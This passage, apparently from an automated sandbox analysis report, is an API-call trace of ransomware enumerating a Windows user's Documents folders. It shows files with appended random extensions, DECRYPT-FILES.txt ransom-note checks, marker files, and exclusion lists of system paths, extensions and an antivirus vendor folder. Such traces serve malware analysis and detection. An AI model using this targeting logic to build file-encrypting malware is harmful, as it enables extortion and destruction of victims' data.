dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x264 [0185.287] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 59 [0185.287] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.287] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\\\DECRYPT-FILES.txt") returned 77 [0185.287] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.287] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 59 [0185.287] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*" [0185.287] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xf1247940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1247940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0185.287] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.287] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xf1247940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1247940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.287] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.287] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.287] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1247940, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf1247940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1247940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.287] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.287] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.287] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.287] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.287] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.287] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.287] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.287] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.287] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.287] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.287] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.288] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.288] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.288] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.288] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.288] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 59 [0185.288] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.288] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0185.288] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\0a16c9.tmp" [0185.288] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.288] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.288] CloseHandle (hObject=0x0) returned 0 [0185.288] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.288] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5f45e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae5f45e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae61a740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.288] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.288] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0xae61a740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x75ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico.0uxB", cAlternateFileName="FOLDER~1.0UX")) returned 1 [0185.288] lstrcmpiW (lpString1="folder.ico.0uxB", lpString2="DECRYPT-FILES.txt") returned 1 [0185.288] lstrcmpiW (lpString1="folder.ico.0uxB", lpString2="autorun.inf") returned 1 [0185.289] lstrcmpiW (lpString1="folder.ico.0uxB", lpString2="boot.ini") returned 1 [0185.289] lstrcmpiW (lpString1="folder.ico.0uxB", lpString2="desktop.ini") returned 1 [0185.289] lstrcmpiW (lpString1="folder.ico.0uxB", lpString2="ntuser.dat") returned -1 [0185.289] lstrcmpiW (lpString1="folder.ico.0uxB", lpString2="iconcache.db") returned -1 [0185.289] lstrcmpiW (lpString1="folder.ico.0uxB", lpString2="bootsect.bak") returned 1 [0185.289] lstrcmpiW (lpString1="folder.ico.0uxB", lpString2="ntuser.dat.log") returned -1 [0185.289] lstrcmpiW (lpString1="folder.ico.0uxB", lpString2="thumbs.db") returned -1 [0185.289] lstrcmpiW (lpString1="folder.ico.0uxB", lpString2="Bootfont.bin") returned 1 [0185.289] lstrlenW (lpString="folder.ico.0uxB") returned 15 [0185.289] lstrcmpiW (lpString1="0uxB", lpString2="lnk") returned -1 [0185.289] lstrcmpiW (lpString1="0uxB", lpString2="exe") returned -1 [0185.289] lstrcmpiW (lpString1="0uxB", lpString2="sys") returned -1 [0185.289] lstrcmpiW (lpString1="0uxB", lpString2="dll") returned -1 [0185.289] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 59 [0185.289] lstrlenW (lpString="folder.ico.0uxB") returned 15 [0185.289] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0185.289] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpString2="folder.ico.0uxB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.0uxB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.0uxB" [0185.289] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.289] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.0uxB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.0uxb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.290] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=30190) returned 1 [0185.290] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.290] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.291] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.291] CloseHandle (hObject=0x270) returned 1 [0185.291] CloseHandle (hObject=0x26c) returned 1 [0185.291] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.291] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0xae61a740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x75ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico.0uxB", cAlternateFileName="FOLDER~1.0UX")) returned 0 [0185.291] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0185.291] CloseHandle (hObject=0x264) returned 1 [0185.291] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xae6408a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae6408a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private\\", cAlternateFileName="")) returned 0 [0185.291] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0185.291] CloseHandle (hObject=0x25c) returned 1 [0185.291] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0185.291] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0185.291] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0185.291] lstrcatW (in: lpString1="My Videos", lpString2="\\" | out: lpString1="My Videos\\") returned="My Videos\\" [0185.292] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" [0185.292] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\Program Files") returned 0x0 [0185.292] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch=":\\Windows") returned 0x0 [0185.292] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\Games\\") returned 0x0 [0185.292] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.292] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.292] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.292] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.292] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.292] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\All Users") returned 0x0 [0185.292] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.292] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.292] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.292] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="AhnLab") returned 0x0 [0185.292] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.292] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned 50 [0185.292] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.292] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\\\0a16c9.tmp") returned 61 [0185.292] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0185.292] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned 50 [0185.292] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.293] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\\\DECRYPT-FILES.txt") returned 68 [0185.293] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.293] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned 50 [0185.293] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*" [0185.293] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xae6408a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae6408a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private\\", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0185.293] CloseHandle (hObject=0x25c) returned 1 [0185.293] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfa02700, ftCreationTime.dwHighDateTime=0x1d556b2, ftLastAccessTime.dwLowDateTime=0x92278ec0, ftLastAccessTime.dwHighDateTime=0x1d5591c, ftLastWriteTime.dwLowDateTime=0xae666a00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xe0ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OE QiY-.xlsx.nOLk", cAlternateFileName="OEQIY-~1.NOL")) returned 1 [0185.293] lstrcmpiW (lpString1="OE QiY-.xlsx.nOLk", lpString2="DECRYPT-FILES.txt") returned 1 [0185.293] lstrcmpiW (lpString1="OE QiY-.xlsx.nOLk", lpString2="autorun.inf") returned 1 [0185.293] lstrcmpiW (lpString1="OE QiY-.xlsx.nOLk", lpString2="boot.ini") returned 1 [0185.293] lstrcmpiW (lpString1="OE QiY-.xlsx.nOLk", lpString2="desktop.ini") returned 1 [0185.293] lstrcmpiW (lpString1="OE QiY-.xlsx.nOLk", lpString2="ntuser.dat") returned 1 [0185.293] lstrcmpiW (lpString1="OE QiY-.xlsx.nOLk", lpString2="iconcache.db") returned 1 [0185.293] lstrcmpiW (lpString1="OE QiY-.xlsx.nOLk", lpString2="bootsect.bak") returned 1 [0185.293] lstrcmpiW (lpString1="OE QiY-.xlsx.nOLk", lpString2="ntuser.dat.log") returned 1 [0185.293] lstrcmpiW (lpString1="OE QiY-.xlsx.nOLk", lpString2="thumbs.db") returned -1 [0185.293] lstrcmpiW (lpString1="OE QiY-.xlsx.nOLk", lpString2="Bootfont.bin") returned 1 [0185.293] lstrlenW (lpString="OE QiY-.xlsx.nOLk") returned 17 [0185.293] lstrcmpiW (lpString1="nOLk", lpString2="lnk") returned 1 [0185.293] lstrcmpiW (lpString1="nOLk", lpString2="exe") returned 1 [0185.293] lstrcmpiW (lpString1="nOLk", lpString2="sys") returned -1 [0185.293] lstrcmpiW (lpString1="nOLk", lpString2="dll") returned 1 [0185.293] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0185.293] lstrlenW (lpString="OE QiY-.xlsx.nOLk") returned 17 [0185.293] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0185.293] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="OE QiY-.xlsx.nOLk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OE QiY-.xlsx.nOLk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OE QiY-.xlsx.nOLk" [0185.293] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.294] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OE QiY-.xlsx.nOLk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oe qiy-.xlsx.nolk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0185.294] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=57517) returned 1 [0185.294] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0185.294] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.295] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.295] CloseHandle (hObject=0x260) returned 1 [0185.295] CloseHandle (hObject=0x25c) returned 1 [0185.295] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.295] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0xae7250e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae7250e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0185.295] lstrcmpW (lpString1="Outlook Files", lpString2=".") returned 1 [0185.295] lstrcmpW (lpString1="Outlook Files", lpString2="..") returned 1 [0185.295] lstrcatW (in: lpString1="Outlook Files", lpString2="\\" | out: lpString1="Outlook Files\\") returned="Outlook Files\\" [0185.295] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Outlook Files\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0185.295] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\Program Files") returned 0x0 [0185.295] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch=":\\Windows") returned 0x0 [0185.295] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\Games\\") returned 0x0 [0185.295] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\All Users") returned 0x0 [0185.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="AhnLab") returned 0x0 [0185.296] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.296] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 54 [0185.296] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.296] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\\\0a16c9.tmp") returned 65 [0185.296] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0185.298] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 54 [0185.298] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.298] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\\\DECRYPT-FILES.txt") returned 72 [0185.298] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.299] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 54 [0185.299] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*" [0185.299] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 